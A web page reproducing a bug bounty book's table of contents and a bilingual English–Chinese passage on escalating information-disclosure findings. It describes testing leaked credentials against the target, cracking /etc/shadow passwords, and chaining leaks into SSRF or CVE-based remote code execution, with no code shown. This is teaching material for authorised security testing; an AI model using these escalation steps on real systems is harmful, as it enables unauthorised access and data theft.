- The Guide to Finding and Reporting Web Vulnerabilities
- About the Author
- About the Tech Reviewer
- Foreword
- Introduction
- Who This Book Is For
- What Is In This Book
- Happy Hacking!
- 1 Picking a Bug Bounty Program
- 2 Sustaining Your Success
- 3 How the Internet Works
- 4 Environmental Setup and Traffic Interception
- 5 Web Hacking Reconnaissance
- 6 Cross-Site Scripting
- 7 Open Redirects
- 8 Clickjacking
- 9 Cross-Site Request Forgery
- 10 Insecure Direct Object References
- 11 SQL Injection
- 12 Race Conditions
- 13 Server-Side Request Forgery
- 14 Insecure Deserialization
- 15 XML External Entity
- 16 Template Injection
- 17 Application Logic Errors and Broken Access Control
- 18 Remote Code Execution
- 19 Same-Origin Policy Vulnerabilities
- 20 Single-Sign-On Security Issues
- 21 Information Disclosure
- 22 Conducting Code Reviews
- 23 Hacking Android Apps
- 24 API Hacking
- 25 Automatic Vulnerability Discovery Using Fuzzers
Escalating the Attack
After you’ve found a sensitive file or a piece of sensitive data, you’ll have to determine its impact before reporting it. For example, if you have found credentials such as a password or an API key, you need to validate that they’re currently in use by accessing the target’s system with them. I often find outdated credentials that cannot be used to access anything. In that case, the information leak isn’t a vulnerability.
在找到敏感文件或敏感数据之后,您需要在报告之前确定它的影响。例如,如果您找到凭据(如密码或 API 密钥),则需要通过使用它们访问目标系统来验证它们当前是否正在使用中。我经常发现过时的凭据无法用于访问任何内容。在那种情况下,信息泄漏不是漏洞。
If the sensitive files or credentials you’ve found are valid and current, consider how you can compromise the application’s security with them. For example, if you found a GitHub access token, you can potentially mess with the organization’s projects and access their private repositories. If you find the password to their admin portals, you might be able to leak their customers’ private information. And if you can access the /etc/shadow file on a target server, you might be able to crack the system user’s passwords and take over the system! Reporting an information leak is often about communicating the impact of that leak to companies by highlighting the criticality of the leaked information.
如果您找到的敏感文件或凭证是有效和当前的,请考虑如何使用它们来破坏应用程序的安全性。例如,如果您发现了一个 GitHub 访问令牌,您有可能破坏组织的项目并访问他们的私人代码库。如果您找到了管理员门户的密码,则可能泄露了客户的个人信息。如果您可以访问目标服务器上的/ etc / shadow 文件,则可能可以破解系统用户的密码并接管系统!报告信息泄漏通常涉及向公司传达该泄漏的影响,通过强调泄漏信息的关键性来提醒他们注意。
If the impact of the information you found isn’t particularly critical, you can explore ways to escalate the vulnerability by chaining it with other security issues. For example, if you can leak internal IP addresses within the target’s network, you can use them to pivot into the network during an SSRF exploit. Alternatively, if you can pinpoint the exact software version numbers the application is running, see if any CVEs are related to the software version that can help you achieve RCE.
如果你发现的信息的影响并不特别严重,你可以探索通过将其与其他安全问题链接起来来升级漏洞的方法。例如,如果你可以泄漏目标网络内部的 IP 地址,你可以在 SSRF 漏洞利用期间使用它们来进入网络。或者,如果你可以确定应用程序正在运行的确切软件版本号,请查看是否有与软件版本相关的 CVE,这些 CVE 可以帮助你实现 RCE。
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论